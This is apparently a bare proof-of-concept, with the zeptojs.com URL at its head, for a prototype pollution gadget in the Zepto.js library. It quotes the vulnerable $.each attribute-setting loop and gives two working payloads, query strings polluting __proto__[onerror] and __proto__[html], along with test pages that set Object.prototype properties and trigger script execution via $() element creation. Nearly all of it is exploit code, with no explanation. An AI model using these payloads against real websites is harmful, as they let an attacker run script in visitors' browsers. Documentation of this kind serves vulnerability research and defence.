URL: https://zeptojs.com/
(typeof $ !== 'undefined' && typeof $.zepto !== 'undefined')
$.each(properties, function(key, value) {
if (methodAttributes.indexOf(key) > -1) nodes[key](value)
else nodes.attr(key, value)
})
?__proto__[onerror]=alert(1)
<script src="https://cdnjs.cloudflare.com/ajax/libs/zepto/1.2.0/zepto.js"></script>
<script>
Object.prototype.onerror="alert(1)"
</script>
<script>
$("<img/src>", {id: "x"})
</script>
?__proto__[html]=<img/src/onerror%3dalert(1)>
<script src="https://cdnjs.cloudflare.com/ajax/libs/zepto/1.2.0/zepto.js"></script>
<script>
Object.prototype.html="<img/src/onerror=alert(1)>"
</script>
<script>
$("<div>", {id: "x"})
</script>